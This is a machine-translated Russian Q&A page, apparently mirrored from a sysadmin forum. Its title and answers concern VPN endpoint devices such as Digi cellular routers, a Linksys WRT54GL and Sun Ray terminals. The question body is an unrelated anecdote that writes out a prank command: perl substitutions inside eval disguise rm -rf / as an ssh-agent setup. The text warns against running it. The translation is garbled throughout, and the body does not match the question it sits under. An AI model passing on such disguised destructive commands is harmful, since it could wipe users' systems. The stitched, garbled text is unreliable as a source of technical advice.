Вопросы Теги

Нужно простое оконечное устройство для vpn доступа

Много лет назад я дома кодировал некоторый материал в php при работе над проектом с моим приятелем, который был специалистом по обслуживанию проекта. Мы были IM'ing друг друга в усилии по сотрудничеству. Мы всегда подтруниваем назад и вперед в игре.

Я пытался заставить ssh-агент работать правильно над моей машиной, в то время как у нас была религиозная война Perl по сравнению с PHP. Затем я упомянул что-то о ssh-агенте, бывшем должном быть eval'ed (не уверенный, почему я сказал это). Таким образом он отправил мне это сообщение в усилии, таким образом, я думал, для помощи мне с моей проблемой (примите во внимание, что я был su - 'редактор для укоренения):

\# eval $(echo ssh-agent | 
perl -pe 's/h-a/m -r/' | 
perl -pe 's/^ss/r/' | 
perl -pe 's/gent/f \//')

ПРЕДУПРЕЖДЕНИЕ! НЕ ВЫПОЛНЯЙТЕ ТУ КОМАНДУ!!!

ЕСЛИ Вы удаляете оценку и выполняете внутреннюю команду отдельно, это:

rm -rf /

Это заняло мне все 4 секунды для замечания то, что происходило, но ущерб был уже нанесен. Я должен был переустановить свою ОС. К счастью, ничто из моей работы не было вытерто кроме некоторого материала в / и т.д. iirc. Он посмеялся, когда я отправил ему сообщение ужаса, спрашивающего, почему он сделал это. Мы - оба долгосрочные системные инженеры. Он не думал, что я выполню его и больше старался бы проверить его прежде просто c&p'ing, и я просто доверял ему так, я даже не полагал, что он играл вокруг. Само собой разумеется, эта небольшая история подходит все время между нами. Так, я решил увековечить его.

Как я смягчил это от случая снова? Я никому не доверяю!

Другая менее интересная история является несколькими годами назад, я делал некоторую работу над полем в жестком реальном времени на работе. У меня было несколько условий, открытых для другой машины. Я должен был удалить некоторый лишний материал в каталоге. Ну, я заблудился в своих терминах и случайно rm'ed. в моем локальном dir, но на неправильном хосте (неправильный термин)!!. Я выполнил команду в/var/lib/mysql вместо/tmp на сервере приложений (другой термин). Само собой разумеется, я вытер производственную базу данных. К счастью, у нас было теплое резервное устройство, которое мы зеркально отразили к тому, в то время как меня и коллегу восстановил основное устройство от резервных копий и резервного устройства. Это заняло приблизительно 18 часов, чтобы сделать.

Смягчение: более осторожный относительно того, в каких окнах я выполняю команды прежде, чем выполнить их.

1
задан 21 August 2009 в 04:34
3 ответа

Digi делает некоторые очень маленькие маршрутизаторы VPN, которые могли похвалить Ваши L230, которые также работают по сотовым сетям 3G. Это решило бы Вашу проблему доступа к LAN, а также преуспевания в VPN.

http://www.digi.com/products/cellulargateways/digiconnectwanfamily.jsp

1
ответ дан 3 December 2019 в 19:59
  • 1
    Я don' t видят, как маршрутизатор решает проблему клиента VPN, который заблокирован вниз. –  Dean Schulze 21 August 2009 в 04:19
  • 2
    При помощи Вашего собственного маршрутизатора + сотовый модем you' ре, создающее Ваше собственное соединение с Интернетом, который абсолютно независим от Вашего клиента. Вы не коснетесь их сети, и маршрутизаторы Digi создали в VPN, таким образом, можно соединиться с VPN через Интернет и все еще соединиться с терминалом. –  Kevin Kuphal 21 August 2009 в 05:19

Вы могли поместить Linux на Linksys WRT54GL, установить программное обеспечение VPN на это, затем прикрепить любое старое устройство позади него.

Мы сделали это для некоторых наших клиентов, которые хотели что-то быстрое и легкое :)

1
ответ дан 3 December 2019 в 19:59
  • 1
    " прикрепите любое старое устройство позади it" уничтожитель соглашения. Они абсолютно won' t позволяют что-либо кроме своих собственных устройств в их сети. –  Dean Schulze 21 August 2009 в 04:20
  • 2
    В этом случае настройте Linksys, чтобы только принять трафик от определенного устройства (возможно, MAC). Однако, так как MAC легко spoofable, этот isn' t столь же безопасное решение как многофункциональное устройство. –  MikeyB 22 August 2009 в 22:43

Аппаратная версия Sun Ray (если они все еще выпускаются) может быть тем, что вы ищете. Вам понадобятся некоторые службы на вашей стороне для его поддержки, но на стороне клиента работает совсем немного. Я работал в домене .gov, который успешно их развернул. Это было до выкупа Oracle, поэтому я не знаю, как они выглядят в наши дни.

Sun Ray может вернуть VPN (к Cisco VPN, возможно, другим), чтобы получить начальный рабочий стол, если вы его настроили. У нас не было проблем с людьми, использующими их дома через DSL-соединение посреди дороги.

1
ответ дан 3 December 2019 в 19:59

Теги

Похожие вопросы